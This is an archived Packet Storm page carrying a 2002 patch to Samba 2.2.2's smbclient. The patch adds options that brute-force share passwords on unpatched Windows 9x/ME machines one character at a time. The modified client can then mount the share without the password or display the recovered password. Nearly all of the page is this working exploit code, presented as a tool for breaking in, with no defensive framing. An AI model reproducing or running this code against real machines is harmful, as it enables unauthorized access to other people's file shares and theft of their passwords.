exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

samba-2.2.2-peche.diff

samba-2.2.2-peche.diff
Posted Feb 19, 2002

Patch against samba 2.2.2 which allows mounting of unpatched win 9x+me machines without knowing the password. There is an option to retrieve the password very quickly too, and another to switch between the two password if both read only and read-write ones are presents.

tags | patch
systems | unix
SHA-256 | abb2ee0f8ddd2bad2811f283572a75c9f79c45d05546be94f9919f5d6ec132ae

samba-2.2.2-peche.diff

Change Mirror Download
diff -r -C 2 samba-2.2.2/source/client/client.c samba-2.2.2-peche/source/client/client.c
*** samba-2.2.2/source/client/client.c Sat Oct 13 23:09:19 2001
--- samba-2.2.2-peche/source/client/client.c Wed Jan 9 21:46:24 2002
***************
*** 28,31 ****
--- 28,37 ----
#endif

+ /* XILUN HACK */
+ static BOOL breakin;
+ static BOOL get_full_pwd;
+ static BOOL reversed_scan;
+ /* XILUN HACK */
+
struct cli_state *cli;
extern BOOL in_client;
***************
*** 1969,1972 ****
--- 1975,1984 ----
struct cli_state *do_connect(char *server, char *share)
{
+ /* XILUN HACK */
+ unsigned char scanpass[10];
+ int way;
+ int first_char;
+ int last_char;
+ /* XILUN HACK */
struct cli_state *c;
struct nmb_name called, calling;
***************
*** 2072,2079 ****
if (!cli_send_tconX(c, sharename, "?????",
password, strlen(password)+1)) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
}

--- 2084,2134 ----
if (!cli_send_tconX(c, sharename, "?????",
password, strlen(password)+1)) {
! /* XILUN HACK */
! if (!breakin) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else {
! BOOL found = False;
! c->sec_mode = 0; /**/
! if (reversed_scan) {
! way = -1; first_char = 0xFF; last_char = 0x20;
! } else {
! way = 1; first_char = 0x20; last_char = 0xFF;
! }
! if (get_full_pwd) {
! int deep;
! for (deep = 0; deep <= 8; deep++) scanpass[deep] = 0;
! for (deep = 0; deep <= 7; deep++) {
! scanpass[deep] = first_char - way;
! while (scanpass[deep] != last_char) {
! scanpass[deep]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, deep+1))
! { found = True; break; }
! }
! if (!found || cli_send_tconX(c, sharename,
! "?????", scanpass, deep+2))
! break;
! }
! } else {
! scanpass[0] = first_char - way;
! scanpass[1] = 0;
! while (scanpass[0] != last_char) {
! scanpass[0]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, 1))
! { found = True; break; }
! }
! }
! if (!found) {
! DEBUG(0,("Sorry you're dealing with a non broken smb server\n"));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else DEBUG(0,("(Partial) password found : %s\n",scanpass));
! }
! /* XILUN HACK */
}

***************
*** 2138,2141 ****
--- 2193,2201 ----
DEBUG(0,("\t-c command string execute semicolon separated commands\n"));
DEBUG(0,("\t-b xmit/send buffer changes the transmit/send buffer (default: 65520)\n"));
+ /* XILUN HACK */
+ DEBUG(0,("\t-w connect to host walking around the password\n"));
+ DEBUG(0,("\t-f display the host full password and connect\n"));
+ DEBUG(0,("\t-r use reverse order to scan the password\n"));
+ /* XILUN HACK */
DEBUG(0,("\n"));
}
***************
*** 2421,2426 ****

while ((opt =
! getopt(argc, argv,"s:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
case 's':
pstrcpy(servicesf, optarg);
--- 2481,2499 ----

while ((opt =
! getopt(argc, argv,"wfrs:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
+ /* XILUN HACK */
+ case 'w':
+ breakin = True;
+ break;
+ case 'f':
+ breakin = True;
+ get_full_pwd = True;
+ break;
+ case 'r':
+ breakin = True;
+ reversed_scan = True;
+ break;
+ /* XILUN HACK */
case 's':
pstrcpy(servicesf, optarg);
diff -r -C 2 samba-2.2.2/source/libsmb/cliconnect.c samba-2.2.2-peche/source/libsmb/cliconnect.c
*** samba-2.2.2/source/libsmb/cliconnect.c Fri Jul 6 04:01:37 2001
--- samba-2.2.2-peche/source/libsmb/cliconnect.c Wed Jan 9 21:45:54 2002
***************
*** 256,260 ****
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
} else {
memcpy(pword, pass, passlen);
--- 256,263 ----
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! if (pass[passlen-1] == 0)
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
! else
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT);
} else {
memcpy(pword, pass, passlen);
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close